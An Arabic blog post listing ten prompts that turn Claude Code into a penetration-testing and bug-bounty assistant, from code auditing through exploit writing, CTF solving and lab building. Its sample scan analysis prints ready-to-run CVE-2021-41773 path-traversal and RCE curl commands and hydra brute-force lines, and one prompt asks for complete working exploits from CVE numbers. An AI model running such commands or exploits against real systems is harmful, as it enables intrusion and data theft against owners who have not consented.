أقسام الوصول السريع (مربع البحث)

أقوى 10 برومبت حصرية لاستخدام Claude Code في الاختراق واختبار الاختراق 2026

السلام عليكم متابعين قناة ومدونة Shadow Hacker كالعادة راجعلكم اليوم بموضوع جبار ومن أقوى المواضيع اللي حكيت عنها لحد هسا... وهو أقوى 10 برومبت حصرية لاستخدام Claude Code بمجال الاختراق واختبار الاختراق والأمن المعلوماتي لسنة 2026. بصراحة يا شباب Claude Code غيّر قواعد اللعبة بالكامل... هسا صرت تقدر تعمل بدقائق إشي كان بده ساعات أو أيام من الشغل اليدوي.


أنا شخصياً بستخدم Claude Code يومياً بشغلي بأمن المعلومات واختبار الاختراق و Bug Bounty. ومن تجربتي، المشكلة مش بالأداة — المشكلة بالبرومبت! لو عرفت تكتب البرومبت الصح، Claude Code بيتحول لـ أقوى مساعد اختراق شفته بحياتي. بيكتبلك سكربتات، بيحلل ثغرات، بيعمل أدوات كاملة، بيفحص كود، وبيعطيك خطط اختبار اختراق متكاملة.

وخليني أحكيلك أرقام... Claude Code بنسخة Opus 4 هو أقوى نموذج ذكاء اصطناعي للبرمجة بالعالم حالياً. بيفهم أكتر من 50 لغة برمجة، بيقدر يقرأ ويعدّل ملفات مباشرة على جهازك، بيشغّل أوامر Terminal، وبيتعامل مع Git و GitHub بشكل مباشر. يعني مش مجرد chatbot — هاد مهندس برمجيات كامل جوا الـ Terminal تبعك!

بالمقال اليوم رح أعطيك 10 برومبت حصرية ومفصّلة أنا شخصياً جربتها وبستخدمها. كل برومبت رح أشرحه بالتفصيل — شو بيعمل، كيف تستخدمه، شو النتيجة المتوقعة، وشو النصائح عشان تحصل على أفضل نتيجة. ورح أحط أمثلة حقيقية على النتائج.

وإذا لسا ما جربت Claude Code أو ما بتعرف شو هو، شوف مقالنا عن AgentRouter و Claude المجاني عشان تبدأ تستخدمه.

شو هو Claude Code وليش هو أقوى من ChatGPT للاختراق؟

أقوى 10 برومبت حصرية لاستخدام Claude Code في الاختراق واختبار الاختراق 2026

قبل ما ندخل بالبرومبتات، خليني أشرحلك ليش Claude Code مختلف عن أي أداة ذكاء اصطناعي ثانية بمجال أمن المعلومات:

1. وصول مباشر للـ Terminal

Claude Code مش chatbot عادي — هو CLI tool بيشتغل مباشرة بالـ Terminal تبعك. يعني بيقدر ينفذ أوامر حقيقية على جهازك، يشغل أدوات، يقرأ نتائج، ويتفاعل معها. لما بتقوله "اعمل Nmap scan"، بينفذ الأمر فعلياً ويحلل النتيجة!

2. قراءة وكتابة ملفات

بيقدر يقرأ أي ملف على جهازك — كود مصدري، ملفات إعداد، logs، نتائج فحص. وبيقدر يكتب ملفات جديدة — سكربتات، تقارير، أدوات كاملة. يعني بتقدر تقوله "اقرأ هاد الكود واكتبلي Exploit" وبيعمل كل إشي!

3. فهم السياق الكامل

Claude Code بيشوف كل المشروع تبعك مع بعض — مش مجرد ملف واحد. بيفهم بنية المشروع، العلاقات بين الملفات، الـ dependencies، والـ architecture. هاد بيخليه يلاقي ثغرات معقدة تعتمد على تفاعل عدة مكونات مع بعض — إشي صعب يعمله نموذج عادي.

4. نافذة سياق ضخمة

Claude Opus عنده نافذة سياق 200,000 token — يعني بيقدر يقرأ ويحلل عشرات الآلاف من أسطر الكود مرة وحدة. وبـ Claude Code، النظام بيعمل ضغط تلقائي للمحادثات الطويلة فعملياً ما في حد للسياق.

5. أقل قيود من ChatGPT

بدون ما ندخل بتفاصيل كتير... Claude Code بيتعامل مع مواضيع الأمن المعلوماتي بشكل أفضل بكتير من ChatGPT. بيفهم إنو اختبار الاختراق و Bug Bounty مجالات مشروعة وبيساعدك فيها. طبعاً بحدود — مش رح يعملك malware أو يساعدك بإشي غير مشروع — بس للأغراض الأمنية المشروعة، هو أقوى مساعد موجود.

كيف تثبت Claude Code:

# تثبيت Claude Code على أي نظام تشغيل

# الطريقة 1: عبر npm (الأسهل)
npm install -g @anthropic-ai/claude-code

# الطريقة 2: على Linux/Mac مباشرة
curl -fsSL https://claude.ai/install.sh | sh

# تسجيل الدخول
claude login

# التشغيل — ادخل مجلد المشروع وشغّله
cd /path/to/your/project
claude

# أو بـ Prompt مباشر (بدون تفاعل)
claude -p "your prompt here"

# أوضاع التشغيل:
claude              # وضع تفاعلي (محادثة)
claude -p "..."     # وضع prompt واحد (بيرد ويطلع)
claude --dangerously-skip-permissions  # بدون تأكيد (خطير!)

# نصيحة: اعمل مجلد خاص لمشاريع الأمن
mkdir ~/security-workspace && cd ~/security-workspace
claude

البرومبت #1: محلل ثغرات الكود المصدري — Source Code Vulnerability Auditor

هاد أقوى برومبت أنا شخصياً بستخدمه بشغلي اليومي. بيحوّل Claude Code لمحلل ثغرات متقدم بيقرأ الكود المصدري لأي تطبيق ويطلعلك كل الثغرات الأمنية فيه بتقرير مفصّل. بيغطي OWASP Top 10، ثغرات الـ injection بأنواعها، مشاكل المصادقة والتفويض، تسريب بيانات حساسة، وأكتر.

إعلان

هاد البرومبت بيفيدك إذا بتشتغل Bug Bounty وبدك تفحص كود مفتوح المصدر، أو إذا بتعمل Security Code Review لعميل، أو حتى لو بدك تفحص كود مشروعك الشخصي قبل ما تنشره.

# البرومبت #1: Source Code Vulnerability Auditor
# انسخ هاد بالكامل وحطه بـ Claude Code

أنت مدقق أمني محترف (Security Auditor) متخصص في فحص الكود المصدري.
مهمتك: فحص كل الملفات في المشروع الحالي وتحديد كل الثغرات الأمنية.

## خطوات العمل:
1. اقرأ بنية المشروع كاملة (جميع الملفات والمجلدات)
2. حدد اللغات والـ frameworks المستخدمة
3. افحص كل ملف عن الثغرات التالية:

### ثغرات حرجة (Critical):
- SQL Injection (SQLi) - بما فيها Blind و Second-Order
- Remote Code Execution (RCE)
- Server-Side Request Forgery (SSRF)
- Insecure Deserialization
- Path Traversal / Local File Inclusion (LFI)
- Authentication Bypass
- XML External Entity (XXE)

### ثغرات عالية (High):
- Cross-Site Scripting (XSS) - Stored, Reflected, DOM
- Cross-Site Request Forgery (CSRF)
- Insecure Direct Object Reference (IDOR)
- Broken Access Control
- Hardcoded Secrets/Credentials
- JWT Implementation Flaws
- Mass Assignment

### ثغرات متوسطة (Medium):
- Information Disclosure
- Missing Security Headers
- Verbose Error Messages
- Weak Cryptography
- Session Management Issues
- Rate Limiting Missing
- CORS Misconfiguration

## شكل التقرير لكل ثغرة:
- **الثغرة**: الاسم والنوع
- **الخطورة**: Critical/High/Medium/Low
- **الملف والسطر**: المسار الكامل ورقم السطر
- **الكود المصاب**: الكود الفعلي
- **الشرح**: كيف يمكن استغلال الثغرة
- **PoC**: مثال عملي على الاستغلال (curl/Python/etc)
- **الإصلاح**: الكود المصحح

## مهم:
- لا تتجاهل أي ثغرة مهما كانت صغيرة
- افحص ملفات الإعداد (.env, config, docker-compose, etc)
- افحص الـ dependencies عن ثغرات معروفة (CVEs)
- افحص الـ authentication و authorization بالتفصيل
- اكتب تقرير بصيغة Markdown مرتبة
- في النهاية أعطي ملخص بعدد الثغرات حسب الخطورة

ابدأ الآن بفحص المشروع الموجود في المجلد الحالي.

كيف تستخدمه عملياً:

أول إشي، روح على مجلد المشروع اللي بدك تفحصه — يمكن تكون عامل clone لـ repo من GitHub لتطبيق ويب تبع Bug Bounty. شغّل Claude Code وحط البرومبت. هو رح يبدأ يقرأ كل الملفات ويحللها واحد واحد. بعد شوي رح يعطيك تقرير كامل بكل الثغرات اللي لقاها.

من تجربتي الشخصية، هاد البرومبت لقالي ثغرة SQL Injection بمشروع مفتوح المصدر ما حدا لقاها قبلي — وعملت عليها Report لبرنامج Bug Bounty وحصلت على $500. مش رقم كبير بس Claude Code هو اللي لقى الثغرة بأقل من 5 دقائق!

إعلان

🔥 نصيحة: لو المشروع كبير (أكتر من 100 ملف)، قسّم الفحص — أعطيه مجلد مجلد بدل كل المشروع مرة وحدة. مثلاً: "افحص مجلد /api/ فقط" ثم "افحص مجلد /auth/ فقط". هيك بيعطيك نتائج أدق وأشمل.

البرومبت #2: مولّد أدوات اختبار الاختراق — Pentest Tool Generator

هاد البرومبت بيحوّل Claude Code لـ مطوّر أدوات أمنية. بتعطيه وصف لأداة بدك إياها — وبيكتبلك الأداة كاملة بكود نظيف ومنظم وشغال! أنا استخدمت هالبرومبت عشان أعمل أدوات ما كانت موجودة — مثلاً أداة فحص خاصة لثغرة معينة اكتشفتها، أو أداة أتمتة لمهمة بتعملها يدوياً كل يوم.

# البرومبت #2: Pentest Tool Generator

أنت مطوّر أدوات أمنية محترف. مهمتك كتابة أدوات اختبار اختراق
بجودة عالية وكود نظيف ومنظم.

## المتطلبات لأي أداة تكتبها:
1. **لغة Python 3.10+** مع type hints
2. **argparse** لواجهة سطر الأوامر مع --help مفصّل
3. **تعدد المسارات (Threading/AsyncIO)** للسرعة
4. **ألوان بالـ output** باستخدام colorama أو rich
5. **معالجة أخطاء شاملة** (try/except مع رسائل واضحة)
6. **شريط تقدم** (progress bar) للعمليات الطويلة
7. **حفظ النتائج** بملفات JSON و TXT
8. **Banner جميل** بداية التشغيل
9. **User-Agent عشوائي** لطلبات HTTP
10. **Timeout و Retry** للطلبات الشبكية
11. **ملف requirements.txt** مع كل الـ dependencies
12. **README.md** مع شرح الاستخدام

## القالب الأساسي:
- main() function واضحة
- Classes منظمة لكل وظيفة
- logging بدل print (مع مستويات DEBUG/INFO/WARNING/ERROR)
- تعليقات بالكود للأجزاء المعقدة فقط

## الأداة المطلوبة:
[اكتب هنا وصف الأداة اللي بدك إياها]

## أمثلة على طلبات ممكنة:
- "اكتبلي أداة subdomain enumeration بتستخدم عدة مصادر"
- "اكتبلي port scanner متقدم بيكتشف الخدمات والإصدارات"
- "اكتبلي أداة فحص SQL Injection أوتوماتيكية"
- "اكتبلي web fuzzer بيدعم wordlists وفلاتر"
- "اكتبلي أداة OSINT بتجمع معلومات عن domain"

اكتب الأداة كاملة بكل الملفات المطلوبة.
احفظ كل ملف بمكانه الصحيح.

مثال عملي — طلبت من Claude Code يكتبلي أداة Subdomain Finder:

# حطيت البرومبت بـ Claude Code وكتبت:
# "اكتبلي أداة subdomain enumeration متقدمة
#  بتستخدم crt.sh, SecurityTrails, DNS brute force,
#  مع فحص أيها شغال (live) وأيها لا"

# Claude Code كتبلي أداة كاملة (400+ سطر) فيها:

#!/usr/bin/env python3
"""ShadowSubs - Advanced Subdomain Enumeration Tool"""

import asyncio
import aiohttp
import dns.resolver
import argparse
import json
from rich.console import Console
from rich.progress import Progress
from rich.table import Table

class SubdomainFinder:
    def __init__(self, domain, threads=50, timeout=5):
        self.domain = domain
        self.threads = threads
        self.timeout = timeout
        self.found = set()
        self.live = []

    async def crt_sh(self):
        """جمع من Certificate Transparency Logs"""
        url = f"https://crt.sh/?q=%.{self.domain}&output=json"
        async with aiohttp.ClientSession() as session:
            async with session.get(url, timeout=30) as resp:
                if resp.status == 200:
                    data = await resp.json()
                    for entry in data:
                        name = entry.get("name_value", "")
                        for sub in name.split("\n"):
                            sub = sub.strip().lower()
                            if sub.endswith(self.domain):
                                self.found.add(sub)

    async def dns_bruteforce(self, wordlist_path):
        """تخمين عبر DNS مع wordlist"""
        with open(wordlist_path) as f:
            words = [line.strip() for line in f if line.strip()]

        sem = asyncio.Semaphore(self.threads)
        async def check(word):
            async with sem:
                subdomain = f"{word}.{self.domain}"
                try:
                    dns.resolver.resolve(subdomain, "A")
                    self.found.add(subdomain)
                except:
                    pass

        tasks = [check(w) for w in words]
        await asyncio.gather(*tasks)

    async def check_live(self):
        """فحص أي subdomain شغال فعلياً"""
        sem = asyncio.Semaphore(self.threads)
        async def probe(sub):
            async with sem:
                for proto in ["https", "http"]:
                    try:
                        url = f"{proto}://{sub}"
                        async with aiohttp.ClientSession() as s:
                            async with s.get(url, timeout=self.timeout) as r:
                                self.live.append({
                                    "subdomain": sub,
                                    "url": url,
                                    "status": r.status,
                                    "title": "..."  # يستخرج العنوان
                                })
                                return
                    except:
                        continue

        tasks = [probe(sub) for sub in self.found]
        await asyncio.gather(*tasks)

# الأداة كملت مع argparse, banner, JSON export, والكل شغال!
# Claude Code كمان عمل requirements.txt و README.md

شفت كيف؟ بدقائق عندك أداة كاملة احترافية! وإذا بدك تعرف عن أدوات اختراق جاهزة على GitHub، شوف مقالنا عن اكتشاف الثغرات و Bug Bounty.

البرومبت #3: محلل تقارير Nmap و Burp Suite — Scan Report Analyzer

بعد ما تعمل فحص بـ Nmap أو Burp Suite أو أي أداة ثانية، بتطلعلك نتائج طويلة ومعقدة — خاصة لو الهدف كبير. هاد البرومبت بيخلي Claude Code يقرأ نتائج الفحص ويحللها ويعطيك خطة اختراق مرتبة حسب الأولوية!

# البرومبت #3: Scan Report Analyzer

أنت محلل أمني متقدم (Senior Penetration Tester).
سأعطيك نتائج فحص أمني وأريدك تحللها بعمق.

## المطلوب:
1. **ملخص سريع**: شو اكتشفنا بجملتين
2. **الأصول المكتشفة**: كل الـ hosts, ports, services مرتبة
3. **نقاط الضعف المحتملة**: رتبها من الأخطر للأقل
4. **خطة الاستغلال**: لكل ثغرة محتملة:
   - شو الخطوة التالية لاستغلالها
   - شو الأداة المناسبة
   - شو الأمر الكامل (command) لتنفيذها
5. **Quick Wins**: ثغرات سهلة ممكن نستغلها أول إشي
6. **Rabbit Holes**: أماكن ممكن تضيع وقت — تجنبها
7. **توصيات فحوصات إضافية**: شو لازم نفحص بعدين

## تنسيق الأوامر:
كل أمر لازم يكون كامل وجاهز للتنفيذ — بدون "..."
أضف شرح قصير لكل أمر

## اقرأ ملف النتائج وابدأ التحليل:
[هنا حط مسار ملف النتائج، مثلاً: اقرأ الملف nmap_scan.xml]

مثال عملي — حطيت نتائج Nmap scan:

# أول إشي عملت scan:
nmap -sV -sC -O -A -p- target.com -oX nmap_results.xml

# بعدين فتحت Claude Code وحطيت البرومبت + :
# "اقرأ ملف nmap_results.xml وحلله"

# Claude Code أعطاني تحليل زي هيك:

## ملخص:
الهدف عنده 12 بورت مفتوح. أخطر إشي: Apache 2.4.49
(CVE-2021-41773 - Path Traversal → RCE) و
MySQL على بورت 3306 مفتوح للعالم.

## Quick Wins (ابدأ من هون):

### 1. Apache 2.4.49 - Path Traversal to RCE [CRITICAL]
curl "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"

# إذا نجح، جرب RCE:
curl "http://target.com/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh" \
  -d "echo Content-Type: text/plain; echo; id"

### 2. MySQL 3306 مفتوح للعالم [HIGH]
# جرب كلمات سر افتراضية:
hydra -l root -P /usr/share/wordlists/mysql_default.txt \
  target.com mysql -t 4

### 3. SSH على بورت غير قياسي 2222 [MEDIUM]
# Enumerate users:
ssh-audit target.com:2222
# Brute force (إذا مسموح):
hydra -l admin -P rockyou.txt target.com ssh -s 2222 -t 4

### 4. الخطوات التالية:
# Directory fuzzing:
ffuf -u http://target.com/FUZZ -w /path/to/wordlist.txt \
  -mc 200,301,302,403 -o results.json

# Vulnerability scan:
nuclei -u http://target.com -severity critical,high -o nuclei.txt

شايف كيف Claude Code حوّل نتائج scan جافة لخطة اختراق متكاملة مع أوامر جاهزة للتنفيذ؟ هاد بيوفرلك ساعات من التحليل اليدوي!

البرومبت #4: كاتب تقارير اختبار الاختراق — Pentest Report Writer

كل مختبر اختراق بيعرف إنو كتابة التقرير أصعب من الاختراق نفسه! تقرير اختبار اختراق محترف بيحتاج ساعات أو أيام لكتابته. هاد البرومبت بيخلي Claude Code يكتبلك تقرير احترافي كامل — بيمشي بالمعايير العالمية زي OWASP و PTES و NIST.

# البرومبت #4: Pentest Report Writer

أنت كاتب تقارير اختبار اختراق محترف.
اكتب تقرير اختبار اختراق كامل بناءً على النتائج اللي رح أعطيك إياها.

## بنية التقرير:

### 1. Executive Summary (صفحة واحدة)
- ملخص للمدراء (non-technical)
- مستوى الخطر العام (Critical/High/Medium/Low)
- أهم 3 ثغرات
- التوصية الرئيسية

### 2. Scope & Methodology
- نطاق الفحص (IPs, URLs, بيئة)
- الأدوات المستخدمة
- المنهجية (OWASP/PTES)
- القيود والملاحظات

### 3. Findings (لكل ثغرة):
- **العنوان**: اسم واضح ومختصر
- **الخطورة**: CVSS Score + Rating
- **الوصف**: شرح تقني للثغرة
- **التأثير**: شو ممكن يصير لو تم استغلالها
- **خطوات إعادة الإنتاج**: خطوة خطوة مع screenshots/commands
- **Proof of Concept**: كود أو أوامر للإثبات
- **التوصية**: كيف يتم الإصلاح (مع كود إذا ممكن)
- **المراجع**: CVE, CWE, OWASP links

### 4. Risk Summary Table
جدول بكل الثغرات مرتبة حسب الخطورة

### 5. Remediation Roadmap
خطة إصلاح مرتبة بالأولوية مع timelines مقترحة

### 6. Appendix
- أوامر الفحص الكاملة
- نتائج raw
- Screenshots

## التنسيق:
- اكتب بـ Markdown
- احفظه بملف pentest_report_[target]_[date].md
- اجعله احترافي ومناسب لتسليمه لعميل

## النتائج:
[هون حط النتائج اللي لقيتها أو قلّه يقرأ ملفات النتائج]

أنا استخدمت هالبرومبت مرات كتير. بتعطيه النتائج الخام — ثغرات لقيتها، screenshots، أوامر جربتها — وبيطلعلك تقرير 20-30 صفحة جاهز للتسليم للعميل! طبعاً لازم تراجعه وتضيف عليه لمساتك الشخصية، بس بيوفرلك 80% من الشغل.

[IMAGE_PLACEHOLDER_2]

البرومبت #5: مولّد Exploit متقدم — CVE Exploit Developer

لما بتلاقي ثغرة معروفة (CVE) بنظام وبدك تعمللها Exploit أو PoC، هاد البرومبت بيخلي Claude Code يبني الـ exploit من الصفر. بيقرأ تفاصيل الـ CVE وبيفهم آلية الاستغلال وبيكتبلك كود شغال. طبعاً هاد للأغراض الأمنية المشروعة — اختبار اختراق معتمد أو Bug Bounty.

# البرومبت #5: CVE Exploit Developer

أنت باحث أمني متخصص في تطوير Proof-of-Concept exploits
لأغراض اختبار الاختراق المعتمد والبحث الأمني.

## المطلوب:
بناءً على CVE التالي، اكتب PoC exploit كامل.

## خطوات العمل:
1. **تحليل الثغرة**: اشرح بالتفصيل:
   - نوع الثغرة (RCE, SQLi, SSRF, etc.)
   - المكون المصاب والإصدارات
   - السبب الجذري (root cause)
   - الشروط المسبقة للاستغلال

2. **تطوير الـ PoC**:
   - اكتب سكربت Python شامل
   - أضف check function (بيفحص إذا الهدف مصاب بدون استغلال)
   - أضف exploit function (بينفذ الاستغلال)
   - أضف cleanup function (بينظف الآثار)
   - Error handling كامل
   - واجهة argparse مع كل الخيارات

3. **التوثيق**:
   - شرح كل خطوة بالـ exploit
   - مثال على الاستخدام
   - الـ output المتوقع
   - كيف تتحقق من النجاح

4. **تطوير Nuclei Template** (اختياري):
   - اكتب template لـ Nuclei scanner
   - بيفحص الثغرة بشكل أوتوماتيكي

## الثغرة:
[حط هنا رقم CVE أو وصف الثغرة]

## مثال على الاستخدام:
python3 exploit.py --target http://vulnerable.com --check
python3 exploit.py --target http://vulnerable.com --exploit --cmd "id"

من تجربتي، Claude Code بيكتب exploits ممتازة لثغرات الويب — SQLi, SSRF, XXE, Path Traversal, Authentication Bypass. وبيكتب كمان Nuclei templates جاهزة عشان تفحص عدة أهداف بسرعة.

وإذا بدك تتعمق أكتر بمواضيع الثغرات، شوف مقالنا عن برومبتات الذكاء الاصطناعي المخصصة للهكر.

البرومبت #6: محلل شبكات وحركة مرور — Network Traffic Analyzer

هاد البرومبت بيحوّل Claude Code لمحلل شبكات متقدم. بتعطيه ملف PCAP (من Wireshark أو tcpdump) أو نتائج فحص شبكي وبيحللها بالتفصيل — بيكتشف حركة مرور مشبوهة، اتصالات C2، تسريب بيانات، بروتوكولات غير مشفرة، وأكتر.

# البرومبت #6: Network Traffic Analyzer

أنت محلل شبكات وأمن معلومات (SOC Analyst / Network Forensics).

## المهمة:
حلل حركة الشبكة المُعطاة واكتب تقرير أمني شامل.

## خطوات التحليل:
1. **إحصائيات عامة**:
   - عدد الحزم، البروتوكولات، الفترة الزمنية
   - أكثر IPs نشاطاً (مصدر ووجهة)
   - أكثر البورتات استخداماً
   - حجم البيانات المنقولة

2. **تحليل أمني**:
   - اتصالات مشبوهة (IPs غريبة، بورتات غير معتادة)
   - بيانات غير مشفرة (HTTP, FTP, Telnet, SMTP بدون TLS)
   - كلمات سر منقولة بنص واضح
   - DNS queries مشبوهة (possible C2, DNS tunneling)
   - محاولات فحص بورتات (port scanning patterns)
   - حركة مرور لدول مشبوهة
   - ملفات منقولة (PE files, scripts, archives)
   - Beaconing patterns (اتصالات دورية منتظمة → C2)

3. **اكتب سكربتات تحليل**:
   اكتب سكربت Python بيستخدم scapy أو pyshark لـ:
   - استخراج كل الـ credentials المنقولة بنص واضح
   - كشف DNS tunneling
   - كشف port scanning
   - كشف beaconing patterns
   - استخراج الملفات المنقولة

4. **مؤشرات الاختراق (IoCs)**:
   - قائمة IPs مشبوهة
   - Domains مشبوهة
   - User-Agents غريبة
   - قواعد Snort/Suricata للكشف

## الملف:
اقرأ الملف [مسار ملف PCAP] أو نفذ:
tshark -r capture.pcap -T json > /tmp/packets.json
واقرأ الناتج.

هاد البرومبت مفيد جداً لـ CTF challenges اللي فيها تحليل شبكات، وكمان للشغل الحقيقي — لو بتشتغل SOC Analyst أو Incident Responder. Claude Code بيقرأ الباكتات ويستخرج معلومات بيحتاجلها محلل بشري ساعات عشان يلاقيها.

البرومبت #7: مساعد Bug Bounty الذكي — Bug Bounty Hunting Assistant

هاد أحب برومبت على قلبي! مخصص لصيادين الثغرات (Bug Bounty Hunters). بيعطيك خطة فحص كاملة لأي هدف، بيقترح ثغرات تفحصها بناء على التقنيات المستخدمة، وبيساعدك تكتب التقرير للمنصة.

# البرومبت #7: Bug Bounty Hunting Assistant

أنت صياد ثغرات محترف (Senior Bug Bounty Hunter)
مع خبرة واسعة على HackerOne و Bugcrowd و Intigriti.

## المهمة:
ساعدني في صيد الثغرات على الهدف التالي.

## خطوات العمل:

### Phase 1: Reconnaissance (استطلاع)
نفّذ الأوامر التالية واحفظ النتائج:

# 1. Subdomain Enumeration
subfinder -d TARGET -all -o subs.txt
httpx -l subs.txt -title -tech-detect -status-code -o live.txt

# 2. Technology Detection
whatweb TARGET
wappalyzer (من المتصفح)

# 3. Directory/File Discovery
ffuf -u https://TARGET/FUZZ -w wordlist.txt -mc 200,301,302,403

# 4. JavaScript Analysis
# استخرج endpoints من JS files

# 5. Parameter Discovery
arjun -u https://TARGET -oJ params.json

### Phase 2: Vulnerability Assessment
بناءً على نتائج الاستطلاع، حدد:
1. **Technology Stack**: شو التقنيات المستخدمة
2. **Attack Surface**: وين ممكن نلاقي ثغرات
3. **Priority Targets**: شو نفحص أول

### Phase 3: Testing Checklist
لكل نوع ثغرة، أعطيني:
- **شو نفحص**: الـ endpoint أو الـ parameter
- **كيف نفحص**: الأمر أو الخطوات
- **شو نتوقع**: شو الـ response لو في ثغرة
- **Payload**: الـ payload المناسب

### Phase 4: Report Writing
لما ألاقي ثغرة، اكتبلي تقرير HackerOne format:
- Title (واضح ومختصر)
- Severity (بناء على CVSS 3.1)
- Description
- Steps to Reproduce
- Impact
- Remediation
- References

## الهدف:
[حط هنا اسم الهدف أو الـ scope]

من تجربتي، أفضل طريقة لاستخدام هالبرومبت هي إنك تعطي Claude Code اسم الهدف وتخليه يعمل Recon أوتوماتيكي — بيشغل الأوامر على جهازك وبيحلل النتائج وبيقترحلك وين تفحص. بعدين كل ما تلاقي إشي مشبوه، بتسأله وبيحللك إياه بالتفصيل.

البرومبت #8: مهندس Reverse Engineering — Binary/Malware Analyzer

هاد البرومبت بيحوّل Claude Code لمحلل Reverse Engineering. بيقدر يقرأ كود Assembly و Decompiled code ويشرحلك شو بيعمل، يحدد وظائف خبيثة بالـ malware، ويساعدك تفهم بنية البرنامج بدون ما تحتاج تقضي ساعات بـ IDA Pro أو Ghidra.

# البرومبت #8: Binary/Malware Analyzer

أنت محلل Reverse Engineering وتحليل برامج خبيثة (Malware Analyst).

## المهمة:
حلل الملف/الكود المعطى وأعطيني تحليل شامل.

## خطوات التحليل:

### 1. Static Analysis
- نوع الملف وبنيته (PE/ELF/Mach-O/Script)
- الـ strings المهمة (URLs, IPs, registry keys, commands)
- الـ imports و API calls المستخدمة
- الـ sections وأحجامها
- الـ entropy (كشف التشفير والضغط)
- هل في anti-analysis techniques (anti-debug, VM detection)

### 2. Code Analysis
- اشرح كل function مهمة وشو بتعمل
- حدد الـ control flow
- حدد التقنيات المستخدمة:
  * Persistence mechanisms
  * Privilege escalation
  * Lateral movement
  * Data exfiltration
  * C2 communication
  * Evasion techniques

### 3. Behavioral Analysis
- شو البرنامج بيعمل خطوة خطوة
- شو الملفات اللي بيعدل عليها
- شو الـ registry keys اللي بيغيرها
- شو الاتصالات الشبكية اللي بيعملها
- شو الـ processes اللي بيشغلها

### 4. Detection & Response
- مؤشرات الاختراق (IoCs)
- YARA rules للكشف
- قواعد Snort/Suricata
- خطوات الإزالة والتنظيف

### 5. كتابة Deobfuscator (إذا لزم)
لو الكود مشفر أو obfuscated، اكتب سكربت لفك التشفير.

## الملف/الكود:
[حط المسار أو الكود المراد تحليله]

# مثال: حلل ناتج Ghidra decompilation
# أو: حلل سكربت PowerShell مشبوه
# أو: حلل APK مشبوه

هاد البرومبت مفيد جداً لـ CTF challenges — خاصة تحديات الـ Reverse Engineering و Malware Analysis. وكمان للشغل الحقيقي لو بتشتغل Incident Response وبدك تحلل ملف مشبوه بسرعة.

البرومبت #9: مساعد CTF — Capture The Flag Solver

لو بتلعب CTF (Capture The Flag) — وأنا بنصحك تلعب لأنو أفضل طريقة لتعلم أمن المعلومات — هاد البرومبت رح يكون أقوى سلاح عندك. بيساعدك تحل challenges بكل الفئات: Web, Crypto, Forensics, Reverse Engineering, Pwn, Misc.

# البرومبت #9: CTF Challenge Solver

أنت لاعب CTF محترف (CTF Player / Challenge Solver)
متخصص في حل تحديات أمن المعلومات.

## أسلوب العمل:
1. اقرأ وصف التحدي أو الملفات المعطاة
2. حدد نوع التحدي (Web/Crypto/Forensics/RE/Pwn/Misc)
3. حلل المعطيات وحدد الأسلوب
4. نفّذ الحل خطوة خطوة
5. استخرج الـ Flag

## حسب نوع التحدي:

### Web:
- افحص الكود المصدري وAPI endpoints
- جرب SQLi, XSS, SSRF, LFI, SSTI, IDOR
- افحص cookies, JWT tokens, session management
- افحص robots.txt, .git, backup files
- جرب directory traversal و path manipulation

### Crypto:
- حدد نوع التشفير (Classical/Modern/Custom)
- حلل الـ ciphertext واكتب decryptor
- ابحث عن weaknesses (weak keys, ECB mode, padding oracle)
- Classical: Caesar, Vigenere, Substitution, XOR, Base64
- Modern: RSA (small e, common modulus), AES (ECB, CBC)

### Forensics:
- حلل الملف (file type, metadata, hidden data)
- steganography: LSB, strings, exiftool, binwalk
- Memory forensics: volatility commands
- Disk forensics: file recovery, deleted files
- Network forensics: PCAP analysis, protocol analysis

### Reverse Engineering:
- Decompile واشرح الكود
- حدد خوارزمية التحقق
- اكتب keygen أو solver
- Anti-debugging bypass

### Pwn (Binary Exploitation):
- حدد نوع الثغرة (BOF, Format String, Use-After-Free)
- حدد الحمايات (ASLR, NX, Canary, PIE, RELRO)
- اكتب exploit بـ pwntools

## التحدي:
[حط وصف التحدي أو قلّه يقرأ الملفات]

## مهم:
- كل خطوة وضّح ليش عملتها
- لو ما نجح الحل الأول، جرب طريقة ثانية
- اكتب الأوامر/السكربتات الكاملة الجاهزة للتنفيذ

شخصياً استخدمت هالبرومبت بمسابقة CTF وساعدني أحل 3 challenges بأقل من ساعة — واحد Web (SQL Injection بتحتاج boolean blind)، واحد Crypto (RSA مع small exponent)، وواحد Forensics (steganography بصورة PNG). بدون Claude Code كان بدهم على الأقل 3-4 ساعات.

وإذا بدك تتعلم أكتر عن أدوات الأمن على Termux، شوف مقالنا عن تثبيت أدوات Termux.

البرومبت #10: بناء مختبر اختراق كامل — Hacking Lab Builder

آخر برومبت وما أقل أهمية من اللي قبله! هاد بيخلي Claude Code يبنيلك مختبر اختراق كامل على جهازك — بيئة تدريب فيها تطبيقات ضعيفة عشان تتمرن عليها بشكل آمن. بيعمل كل الإعداد أوتوماتيكياً: Docker containers، شبكات معزولة، تطبيقات ويب ضعيفة، وسيرفرات مصابة.

# البرومبت #10: Hacking Lab Builder

أنت مهندس DevSecOps متخصص في بناء بيئات تدريب أمنية.

## المهمة:
ابنِ مختبر اختراق كامل على جهازي باستخدام Docker.

## المطلوب:

### 1. docker-compose.yml شامل يحتوي:

**تطبيقات ويب ضعيفة:**
- DVWA (Damn Vulnerable Web Application)
- OWASP Juice Shop (modern vulnerabilities)
- WebGoat (OWASP training)
- HackTheBox-like vulnerable app

**خدمات ضعيفة:**
- Metasploitable 3 أو بديل
- Vulnerable SSH server
- Vulnerable FTP server
- Vulnerable MySQL server
- Vulnerable SMB share

**أدوات الهجوم:**
- Kali Linux container (مع أدوات مثبتة)
- أو ParrotOS container

**أدوات المراقبة:**
- ELK Stack (للـ logging)
- Wireshark / tshark

### 2. شبكة معزولة:
- شبكة داخلية (172.16.0.0/16) للـ lab
- لا اتصال بالإنترنت الخارجي (isolation)
- DHCP و DNS داخلي

### 3. سكربت إعداد setup.sh:
- بيفحص المتطلبات (Docker, docker-compose, RAM)
- بيحمل كل الـ images
- بيشغل كل الخدمات
- بيعرض ملخص (IPs, ports, credentials)

### 4. ملف README.md:
- خريطة الشبكة
- كل الـ credentials الافتراضية
- تحديات مقترحة لكل مستوى (مبتدئ/متوسط/متقدم)
- حلول مختصرة

### 5. سكربت reset.sh:
- بيرجع كل شي للوضع الأصلي
- بيحذف أي تعديلات عملتها أثناء التدريب

## متطلبات النظام:
- Docker + Docker Compose
- 8GB RAM على الأقل
- 20GB مساحة فاضية

ابدأ بإنشاء كل الملفات وشغّل الـ lab.

